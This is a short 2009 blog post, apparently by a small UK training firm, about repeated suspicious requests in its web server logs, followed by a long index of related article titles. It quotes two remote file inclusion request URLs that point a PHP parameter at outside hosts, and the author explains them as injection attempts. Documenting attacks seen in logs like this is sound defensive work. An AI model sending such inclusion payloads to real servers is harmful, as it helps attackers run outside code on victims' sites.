Our web site logs are getting a lot of requests containing "babycaleb" and "fortunecity" ... looking for URLs such as these:
/resources/ex.php4?item=http://babycaleb.fortunecity.co.uk/picture.htm?
/resources/ex.php4?item=http://64.15.67.17/~artatgig/caleb.htm?
and said to be from an Internet Explorer browser (user agent).
Hmmm ... they look like injection attacks to me, where someone is attempting to include his / her content into our pages. And because the requests come from a lot of different places, there's something viral about the attack - so that when it gets in to somewhere, it's not only feeding whatever the content is via that page if it can, but it's also taking over that machine and using it to attack further machines.
I have not looked all that deep, but I have checked that we're not vulnerable to the attack (save that it's using bandwidth - 12,000 requests out of 140,000 to our server yesterday!) and found some other pages -
here and
here which are safe to visit and will tell you a little more.
(written 2009-01-31)
Associated topics are indexed under
G909 - Well House Consultants - Spam, Spamming and Spammers [3506] Cold call contacts - preference services and turning off spam sales approaches - (2011-11-03)
[3352] World Trade Register - Certainly NOT worth 2985 Euros. - (2011-07-09)
[3316] Twitter Phishing Trips ... and a great new alert service - (2011-06-04)
[3190] What do the following web sites have in common? - (2011-03-03)
[3166] Well house is strong - confirmed? - (2011-02-11)
[3016] The legal considerations of your web presence - revisited - (2010-10-26)
[2884] Hotlinked images onto adult material sites - (2010-07-23)
[2697] Email metrics and filtering - (2010-03-28)
[2398] Websitemediasolution and a goldfish called Carl Johnson - (2009-09-06)
[2276] Who is Marc Schneider of Multilingual Search Engine Optimization Inc - (2009-07-10)
[2179] Offers that I can refuse - (2009-05-12)
[2177] Preventing forum spam - checks at sign up - (2009-05-12)
[1978] From spam to mod_alias - finding resources - (2009-01-05)
[1817] Marc Schneider is still having email trouble - (2008-09-30)
[1763] Co-operating to save, yet we dont - (2008-08-21)
[1532] Comment spam blocked. Please comment via Forums - (2008-02-05)
[1523] Ive just received an email from myself. Should I be worried? - (2008-01-29)
[1115] Unexpected visitors to our site - (2007-03-22)
[1037] Impact Engineering and Backscatter - (2007-01-16)
[872] Email metrics - (2006-09-20)
[495] More spam - a success story - (2005-11-13)
[417] Telephone Preference Service - we're registered - (2005-08-17)
[347] Frightening and from-friend viruses and spams - (2005-06-14)
[338] OO techniques are hard to teach - (2005-06-06)
[276] An apology to Mr Boneparte - (2005-04-11)
[268] Information request forms, cleaning up spam - (2005-04-05)
[259] Responding to spam - (2005-03-27)
G900 - Well House Consultants - Miscellany [3612] Help to get online in Melksham - (2012-02-13)
[3315] Friday - Electrician, Food Festival, C++ Course, Rail Group Meeting - (2011-06-03)
[3000] Looking forward - the next 3000 - (2010-10-16)
[2534] And now for some posts a bit more technical - (2009-12-12)
[2258] Questions I have been asked on answering the phone - (2009-06-26)
[2144] Looking for a career change - Physician to Web Site Designer - (2009-04-28)
[1898] Every cloud has a silver lining - (2008-11-21)
[1867] Domain Renewal Group - (2008-11-02)
[1183] Improving searches - from OR to AND? - (2007-05-11)
[1040] What the customer is looking for - effective training - (2007-01-17)
[1038] Know to the police - (2007-01-16)
[1024] Web site - a refresh to improve navigation - (2007-01-07)
[636] What is your business latency and potential? - (2006-03-06)
[397] Where now for dial-up providers? - (2005-07-30)
[336] Targetted Advertising - (2005-06-05)
[333] Do NOT follow links or read attachments in these emails - (2005-06-01)
[201] 0870 telephone numbers - (2005-02-03)
[170] MySQL, Java, PHP and Linux - new technical articles - (2005-01-06)
G911 - Well House Consultants - Search Engine Optimisation [2748] Monitoring the success and traffic of your web site - (2010-05-01)
[2686] Freedom of Information - consideration for web site designers - (2010-03-20)
[2562] Tuning the web site for sailing on through this year - (2010-01-03)
[2552] Web site traffic - real users, or just noise? - (2009-12-26)
[2428] Diluting History - (2009-09-27)
[2330] Update - Automatic feeds to Twitter - (2009-08-09)
[2324] What search terms FAIL to bring visitors to our site, when they should? - (2009-08-05)
[2137] Reaching the right people with your web site - (2009-04-23)
[2107] How to tweet automatically from a blog - (2009-03-28)
[2106] Learning to Twitter / what is Twitter? - (2009-03-28)
[2065] Static mirroring through HTTrack, wget and others - (2009-03-03)
[2045] Does robots.txt actually work? - (2009-02-16)
[2000] 2000th article - Remember the background and basics - (2009-01-18)
[1984] Site24x7 prowls uninvited - (2009-01-10)
[1982] Cooking bodies and URLs - (2009-01-08)
[1971] Telling Google which country your business trades in - (2009-01-02)
[1969] Search Engines. Getting the right pages seen. - (2009-01-01)
[1793] Which country does a search engine think you are located in? - (2008-09-11)
[1344] Catching up on indexing our resources - (2007-09-10)
[1029] Our search engine placement is dropping. - (2007-01-11)
[1015] Search engine placement - long term strategy and success - (2006-12-30)
[427] The Melksham train - a button is pushed - (2005-08-28)
[165] Implementing an effective site search engine - (2005-01-01)
Some other Articles
sw_vers - what version of OSX am I running?Pre and post increment - the ++ operatorShort health and safety courseLearning Python - many new example programsBaby Caleb and Fortune City in your web logs?UnboundLocalError - Python MessagePython - a truly dynamic languageApache httpd and Apache Tomcat miscellanyService Excellence AwardsFirst Class